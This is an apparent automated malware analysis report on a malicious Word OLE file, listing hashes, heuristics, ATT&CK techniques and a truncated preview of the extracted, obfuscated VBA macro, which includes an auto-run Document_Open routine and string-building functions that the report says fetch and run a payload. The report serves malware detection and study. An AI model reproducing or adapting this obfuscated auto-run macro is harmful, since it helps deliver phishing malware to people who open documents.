Office (OLE) malware analysis — malicious · 42a5014d9efcbaa5

MALICIOUS

Office (OLE)

127.9 KB Created: 2018-10-04 07:52:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 7947a6a5ad4bd3ee74762cfc210a3dce SHA-1: d159c26f8c4f3bb3166c6e2949efb1e17020419e SHA-256: 42a5014d9efcbaa57da699dd427dd9c8292b56fef0d480afe303ffd59f0b163e

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high-slack anomaly and a detected VBA macro. The Document_Open macro is present and appears to be obfuscated, with a call to a function that concatenates multiple strings. This suggests the macro is intended to download and execute a secondary payload. The presence of the Document_Open macro and the nature of the obfuscated script strongly indicate a malicious intent, likely delivered as a spearphishing attachment.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 130,944 bytes but its declared streams total only 36,368 bytes — 94,576 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 19717 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	19717 bytes
SHA-256: `6beb4c2e7f06616c03c48a98d1ed37edff4ccd8f69b09d0ebca1d023cbf1bc0f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KuXuJEF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If BcPuN > dwHpz Then Dim ECRQmh() Xrdnj = PSqja + IGmNZC TzjRBz = GCCscL + ALPXo + lzGmRj + oUSprN End If If SGXzbK < 2 Then Dim EXltDz() RJfYM = IdQwkc + UatZf + cvcDo + cuiEkK LGDHJ = QVrop + NwFWdd + NwUNo + rkkzd End If If lSRzRT <> 15 Then Dim NOklGn() bpWXAa = wUqtO + SbjYN + JpuhH + KtwzM End If If FmAFlV < 2 Then Dim rjKITb() jbmPm = ibWDVI + URpkd End If If naboj Eqv MQzEO Then Dim IvWpkT() VswzVH = mkNBO + DnXpv End If tpRkmjuLBGzoTk (cGCtDaYv + wWCSmJQi + BalUrjUlt + lBPGOtzciHH + vIPZOKj + GbNuIL + vCiSJBQovwi + NlGhZSnvpTH + iCZVt + lqpNRMj + zHuKsTqa) If jLBPG <> awHRj Then Dim DlwDop() ULRBq = ERusc + OOtLQ + YGXuw + CzZmh End If If EMSEkV >= cWkzP Then Dim hbsnd() LVozQ = pdbFDB + hLotj TwCQB = ijOZQ + RlzROP End If If UwqDz <= KLwCF Then Dim FfBVaJ() hrPifa = NwssR + TdIRXK sGzcER = sYBcz + GsXEPL End If If aQcCwp > cUXht Then Dim TLkCHm() vcNoN = UwLThO + TZSInt End If End Sub Attribute VB_Name = "KuskWSj" Function cGCtDaYv() NVjlVPFtOC = "`ja ,S[7[L,@ [p[b[" + "q [5[T:[Y[M`[ [0[^" + "s[ [Y[2O[ [g" + "[a[y[ [/[ " + "@[ [0[f[D " + "[GO%[ [h[D" + """" + "[ [q[w[z[" If ovYlr Xor EMZiiw Then Dim LzrPL() UjsNu = FqYmXW + MvXLr End If If vuJOKE Or KcfBA Then Dim tfiKD() GYVlhc = YjAjni + KVSdz + NbBku + WnQmp dHhDZJ = lYjYJw + XhzYNE End If If sVXZs > khLFzi Then Dim BYVVNH() QMmNVR = LMZYXv + SXphi End If If ItSoUA <= 14 Then Dim iDtvDL() zowii = mtfZCM + jcolz + SBbODs + KbnfrU tNHbd = dFPOs + IiwBOI End If LFQllztO = " [U[/[-[ [9[y" + "[G[ [0[J[q[ s[]k" + "[ [ " + """" + "[)[ [G[t[i[ [d" + "[:[u[ k[][I[ " + "[Z[.[<[z[v[.[" TiGpLXhAA = "G[z[q[fO[xs[.[I" + "[e[R[9[/`[E[y[6[q[e" + "[R[i[^[7O[t`[][6[F" + "[z[$[\[![8k[IS[h[L[z" anEPiL = "[=[^StK[bB[E[" + "Xo[2[/[P[_[(@[.8[r[b" + "[.[c[T[y[F[E[" + "?P[Rk[([m[z!I[-[C[ [" + "]s[\[j[V[{[r[b[c[t[W" + "[qA@[J[F[ [N@" If fXkrJ And wHwLA Then Dim WmHvJ() NnhDr = CAoprY + TluCfp End If If fZYbw < hAvqdE Then Dim zFfcf() oJRJQY = jYbjbF + jiNJbt UztzOT = WfOazs + INQHDX End If iWrUHKwwn = "[D[#[n[b0[/[l" + "[h[/Ko[l[G%[" + "Ps[h&[^k[m[" cGCtDaYv = NVjlVPFtOC + LFQllztO + TiGpLXhAA + anEPiL + iWrUHKwwn If LPXNU < 12 Then Dim rWAmD() KXJBE = KtMJbM + aUzBY + iLbik + FMGnsZ pJwpG = wiEPL + nKAtu End If If cRZIi Xor ZKwhDF Then Dim kOXEc() rvaqZv = jwhFS + uXzvQ PAjwz = AKrRZm + RQCZCa End If If SJddt > rLwmS Then Dim DMiKz() uZlYOW = JBvrwv + QnwqD End If End Function Function wWCSmJQi() If JzuiGf < Flrabj Then Dim buvGij() vTwrw = PPoHfU + QmdjQ + RvKzX + oqMCv End If If WVNfwn >= ocpzk Then Dim GVKpQL() TSRlUa = JADNs + vwqCH wHaoGM = cNTjW + jHQEDb End If iOuqwjkP = "0[DF[l[rQ[8[X['@&[UY" + "v[cK[Z[D[E[f[t" + "[:k[U[ v[!SZO[" + " [Cd[([)[E[a[3[H[a[" If wnZbF = zIiHij Then Dim isdKZ() zKqUj = ICitmb + KhJnPi + ndEoY + CUZYat FYEHT = AwYUOs + mZhYFO + SRTFCv + ZndGTt End If If SsHbb And VwFjQU Then Dim SiGSz() nTLSl = zcKauA + HdROi End If If lcBUWi > PJqvs Then Dim dnASL() knFwF = AaIvO + zHvnFX + rBHCKP + DpwAc HfoDjd = wVECTu + wkGpid + TMckui + ULdISb End If woMOUDNi = "f[Y[t[D[j[z[g[v[m[>" + "[![;[u[%[3[" + "([g[b[9[)[#[i/[r[5" If zPXBiN <= 19 Then Dim BcWpTV() zHaVjd = LWLiz + jAUYL + MpEoQH + JaiDEh HdKoMa = jmsMT + AIBIwd + JJvSJ + wTmcT End If zoXURFN = "[fk[P[.[C[l[X" + "[_[a[R[P[?[^[" + "x[ [jl[f[{[M[i.[G[" If TpCWcu Or DRJZJV Then Dim nsBOj() MhzGEM = raScFF + ASLEd vzlbNs = hmQuB + LSlqv + QSCdw + UEPTUj End If If hDwjEl Eqv wAXzLz Then Dim tzkTd() hmNdQ = CObETX + TuUlw + bUWjYi + DiCBp End If If BoNwYt Eqv tvFJX Then Dim ntmPcQ() NQsWmu = oCNRkz + QXF ... (truncated)

SHA-256: 6beb4c2e7f06616c03c48a98d1ed37edff4ccd8f69b09d0ebca1d023cbf1bc0f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KuXuJEF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If BcPuN > dwHpz Then

Dim ECRQmh()
Xrdnj = PSqja + IGmNZC
TzjRBz = GCCscL + ALPXo + lzGmRj + oUSprN

End If
   If SGXzbK < 2 Then

Dim EXltDz()
RJfYM = IdQwkc + UatZf + cvcDo + cuiEkK
LGDHJ = QVrop + NwFWdd + NwUNo + rkkzd

End If
   If lSRzRT <> 15 Then

Dim NOklGn()
bpWXAa = wUqtO + SbjYN + JpuhH + KtwzM

End If
   If FmAFlV < 2 Then

Dim rjKITb()
jbmPm = ibWDVI + URpkd

End If
   If naboj Eqv MQzEO Then

Dim IvWpkT()
VswzVH = mkNBO + DnXpv

End If
tpRkmjuLBGzoTk (cGCtDaYv + wWCSmJQi + BalUrjUlt + lBPGOtzciHH + vIPZOKj + GbNuIL + vCiSJBQovwi + NlGhZSnvpTH + iCZVt + lqpNRMj + zHuKsTqa)
   If jLBPG <> awHRj Then

Dim DlwDop()
ULRBq = ERusc + OOtLQ + YGXuw + CzZmh

End If
   If EMSEkV >= cWkzP Then

Dim hbsnd()
LVozQ = pdbFDB + hLotj
TwCQB = ijOZQ + RlzROP

End If
   If UwqDz <= KLwCF Then

Dim FfBVaJ()
hrPifa = NwssR + TdIRXK
sGzcER = sYBcz + GsXEPL

End If
   If aQcCwp > cUXht Then

Dim TLkCHm()
vcNoN = UwLThO + TZSInt

End If
End Sub


Attribute VB_Name = "KuskWSj"
Function cGCtDaYv()
NVjlVPFtOC = "`ja ,S[7[L,@ [p[b[" + "q [5[T:[Y[M`[ [0[^" + "s[ [Y[2O[ [g" + "[a[y[ [/[ " + "@[ [0[f[D " + "[GO%[ [h[D" + """" + "[ [q[w[z["
If ovYlr Xor EMZiiw Then

Dim LzrPL()
UjsNu = FqYmXW + MvXLr

End If
   If vuJOKE Or KcfBA Then

Dim tfiKD()
GYVlhc = YjAjni + KVSdz + NbBku + WnQmp
dHhDZJ = lYjYJw + XhzYNE

End If
   If sVXZs > khLFzi Then

Dim BYVVNH()
QMmNVR = LMZYXv + SXphi

End If
   If ItSoUA <= 14 Then

Dim iDtvDL()
zowii = mtfZCM + jcolz + SBbODs + KbnfrU
tNHbd = dFPOs + IiwBOI

End If
LFQllztO = " [U[/[-[ [9[y" + "[G[ [0[J[q[ s[]k" + "[ [ " + """" + "[)[ [G[t[i[ [d" + "[:[u[ k[][I[ " + "[Z[.[<[z[v[.["
TiGpLXhAA = "G[z[q[fO[xs[.[I" + "[e[R[9[/`[E[y[6[q[e" + "[R[i[^[7O[t`[][6[F" + "[z[$[\[![8k[IS[h[L[z"
anEPiL = "[=[^StK[bB[E[" + "Xo[2[/[P[_[(@[.8[r[b" + "[.[c[T[y[F[E[" + "?P[Rk[([m[z!I[-[C[ [" + "]s[\[j[V[{[r[b[c[t[W" + "[qA@[J[F[ [N@"
If fXkrJ And wHwLA Then

Dim WmHvJ()
NnhDr = CAoprY + TluCfp

End If
   If fZYbw < hAvqdE Then

Dim zFfcf()
oJRJQY = jYbjbF + jiNJbt
UztzOT = WfOazs + INQHDX

End If
iWrUHKwwn = "*[D[#[n[b0[/[l" + "[h[/Ko[l[G%[" + "Ps[h&[^k[m["
cGCtDaYv = NVjlVPFtOC + LFQllztO + TiGpLXhAA + anEPiL + iWrUHKwwn
   If LPXNU < 12 Then

Dim rWAmD()
KXJBE = KtMJbM + aUzBY + iLbik + FMGnsZ
pJwpG = wiEPL + nKAtu

End If
   If cRZIi Xor ZKwhDF Then

Dim kOXEc()
rvaqZv = jwhFS + uXzvQ
PAjwz = AKrRZm + RQCZCa

End If
   If SJddt > rLwmS Then

Dim DMiKz()
uZlYOW = JBvrwv + QnwqD

End If
End Function
Function wWCSmJQi()
If JzuiGf < Flrabj Then

Dim buvGij()
vTwrw = PPoHfU + QmdjQ + RvKzX + oqMCv

End If
   If WVNfwn >= ocpzk Then

Dim GVKpQL()
TSRlUa = JADNs + vwqCH
wHaoGM = cNTjW + jHQEDb

End If
iOuqwjkP = "0[DF[l[rQ[8[X['@&[UY" + "v[cK[Z[D[E[f[t" + "[:k[U[ v[!SZO[" + " [Cd[([)[E[a[3[H[a["
If wnZbF = zIiHij Then

Dim isdKZ()
zKqUj = ICitmb + KhJnPi + ndEoY + CUZYat
FYEHT = AwYUOs + mZhYFO + SRTFCv + ZndGTt

End If
   If SsHbb And VwFjQU Then

Dim SiGSz()
nTLSl = zcKauA + HdROi

End If
   If lcBUWi > PJqvs Then

Dim dnASL()
knFwF = AaIvO + zHvnFX + rBHCKP + DpwAc
HfoDjd = wVECTu + wkGpid + TMckui + ULdISb

End If
woMOUDNi = "f[Y[t[D[j[z[g[v[m[>" + "[![;[u[*%[3[" + "([g[b[9[)[#[i/[r[5"
If zPXBiN <= 19 Then

Dim BcWpTV()
zHaVjd = LWLiz + jAUYL + MpEoQH + JaiDEh
HdKoMa = jmsMT + AIBIwd + JJvSJ + wTmcT

End If
zoXURFN = "[fk[P[.[C[l[X" + "[_[a[R[P[?[^[" + "x[ [jl[f[{[M[i.[G["
If TpCWcu Or DRJZJV Then

Dim nsBOj()
MhzGEM = raScFF + ASLEd
vzlbNs = hmQuB + LSlqv + QSCdw + UEPTUj

End If
   If hDwjEl Eqv wAXzLz Then

Dim tzkTd()
hmNdQ = CObETX + TuUlw + bUWjYi + DiCBp

End If
   If BoNwYt Eqv tvFJX Then

Dim ntmPcQ()
NQsWmu = oCNRkz + QXF
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.